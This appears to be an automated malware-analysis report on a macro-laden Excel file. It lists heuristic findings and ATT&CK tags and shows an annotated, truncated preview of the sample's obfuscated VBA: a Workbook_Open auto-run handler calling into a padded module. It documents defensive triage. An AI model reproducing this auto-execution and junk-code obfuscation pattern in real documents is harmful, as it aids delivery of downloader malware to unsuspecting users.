MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically a Workbook_Open event. This event triggers obfuscated VBA code that utilizes Shell() and CreateObject calls, strongly indicating an attempt to download and execute a secondary payload. The presence of a long encoded blob and the nature of the VBA code suggest downloader or dropper functionality. The script preview below is truncated and does not show the Shell() or CreateObject calls themselves, so confirm them against the full extracted macros.bas.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELL: Shell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPEN: Workbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15716 bytes |
SHA-256: b3b2e5e4aae5869f688a4e48171b50b385b9e344755d5d913be1d2712493cd96 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: auto-run entry point. This Sub lives in the ThisWorkbook module,
' so Excel runs it when the workbook is opened with macros enabled; this is the
' handler behind the report's OLE_VBA_WBOPEN finding. The only statement here
' that has any effect is the call into module kpJe3; everything after it is filler.
Private Sub workbook_open()
' Transfers control to procedure P4wOFRH6CjNRPZS_PCdX in module kpJe3.
' That procedure's body is not in the truncated preview, so what it does
' is not established here - TODO confirm against the full macros.bas.
kpJe3.P4wOFRH6CjNRPZS_PCdX
' Junk-code padding from here to End Sub: every While compares two different
' integer literals, so the condition is always False and the loop never runs.
' The Dim lines only declare variables that this Sub never reads or writes.
' The random identifiers and dead loops add bulk without changing behaviour;
' for triage they can be ignored, and the repeating
' "While <n> = <m> / Dim ... As Variant / Wend / Dim ... As Integer" shape
' is a recognisable pattern of this sample's obfuscation.
While 3 = 7485
Dim pH6B_u_qaWbXbtstqzVps5TqgnZ6__J1Nw3F7 As Variant
Wend
Dim uIURZcoFyy As Integer
While 13 = 3659
Dim fqhRYowouwNcZSDqVLkHozkw5p_VQZoiry3NZvtJa As Variant
Wend
Dim GGSrPsANsFaeo As Integer
While 18 = 1607
Dim Ip_uVsnYVSFntkZyOjaYqfqQDm79GhSMDCnLHoXAeAuwKDfFjYbf9_7l8w As Variant
Wend
Dim psvoQx_3jq6L As Integer
While 1 = 3859
Dim oiJZ4pu4__FyWr_vM8EANU9oNyr7wRcyIWs3ThJO1Drpk6QirLokj47Sj As Variant
Wend
Dim eKD7xEueQn_8KZn As Integer
While 12 = 1368
Dim wyHJlRCQgHMim1MNYYRyVERC76ISPPjfv_xutvpPb As Variant
Wend
Dim exifGnCXig2 As Integer
While 11 = 8159
Dim kQpfELpGrAOgqwlCadlrAUcidcZweP2pBmIrFNnh_Hs2OO2sekk47 As Variant
Wend
Dim x1OwEBlv2la As Integer
While 15 = 3448
Dim GhdCm45LyDr2kkSMjpQ3o7sLv34ALBuGeQspty_joW_3E As Variant
Wend
Dim mKvwA_irvJyP As Integer
While 21 = 4255
Dim Ps_49vQjVS2mcukpMP2zFwOqMYAogvehzbhUjuX As Variant
Wend
Dim QjekSSGRNc2d As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "kpJe3"
Dim jWAx9Phjjjw8KOQ93yCWNIWShYdwQdO46f_P4O9k_To2633f6WcfWLJY_qOiutR_S3AoO__myZV3ddVne713A As String
Function dQ8IbcQoiukBiwRvALNEa1iNkJ5V_EuKnP_O2Q_2QEyf9bBe_(wpALw_ESfyQr82lsd29TSYGYJg8yw7M_NvsEim5CUebIMso3WPnKSVIWhkBOEOfijPbKHeI1769x67JZ1DZfQBo2kTg7jo6_93h6Obt2EwMWWUZjY)
While 28 = 2736
Dim vv_rllds93HK8MUCqqPsFQE2U8uW7Wr3JhmOnqSiWaGweGBtvb As Variant
Wend
Dim jjYbfcoFUn As Integer
While 8 = 9721
Dim zFvkIO_XjEX9VqToIRVL5AjdvFcqAI As Variant
Wend
Dim ifUnrPnfmOGmI As Integer
While 4 = 8385
Dim oCjMqG1RVtGsyeQxBvRVZe1mq8D_ln As Variant
Wend
Dim F_P15ZK3uiIzLvM As Integer
Dim KYTdobdnLx71_z6GmGmoOXXTTkGvIYG6mLuzwERT7PfvjzrGay__ebnv__HDSqd
While 6 = 8430
Dim tVrjcyOrHK7esCzoqlBa8j1kH_rKjR_Yv_Sm4DmOAGuNNW As Variant
Wend
Dim BeSIdHJc5HeEZb As Integer
While 5 = 9392
Dim ECGzFfsmsLum9vZzykVu8L2Yw5NQHI As Variant
Wend
Dim GwlII794GqnWvF As Integer
While 7 = 6707
Dim W1HWC_S3sod3IqBJQZdiD7_ylbz4cnEiYuB6u As Variant
Wend
Dim zNDyMD7oPvP26 As Integer
Dim h6PWagDbKv9LecKJousWE6pWFzO6GtgZK5wW5hqDNQrXH9XGs9rlV1wkO2PkPFTaNh_jowOFDnGxLPNFaGKGA4CTGJGCQEwG7PHj8wa6skhrs9X8mHIH
While 7 = 1915
Dim YL3LBZ1SuiMXYDh4bXoEYZJYsz3CHTpiBfN3pLskDZ As Variant
Wend
Dim ozYx9WtxWjuf8 As Integer
While 14 = 6942
Dim BbbJfxIY3mV2yoMNnDA8UeiRA3nXfQ9P_PzMshDOPnvKC6I As Variant
Wend
Dim qfhseshke2IHl As Integer
While 23 = 6111
Dim Hu3jnE1gx9eE_uqqrVO_s718hbfanTTiXZFdtKg7 As Variant
Wend
Dim Dk2fBle8z3 As Integer
While 1 = 7443
Dim vd3D3J44AJiY3cn5pinK6fyQAGDS567gju As Variant
Wend
Dim gyoTg5jzIVWmrW2 As Integer
While 2 = 6087
Dim E65Sn7OokBtEi9_LAyF6yOUArkEVb4VYoax9AM6w As Variant
Wend
Dim QIDQvxAz_HU As Integer
While 19 = 2565
Dim xjaBzi4jBz2LpoSZFI_Jw3RnoKCM4jNPRggyMX8YFl3 As Variant
Wend
Dim X6VlbW3p_8h5P As Integer
Set h6PWagDbKv9LecKJousWE6pWFzO6GtgZK5wW5hqDNQrXH9XGs9rlV1wkO2PkPFTaNh_jowOFDnGxLPNFaGK
... (truncated)
|
|||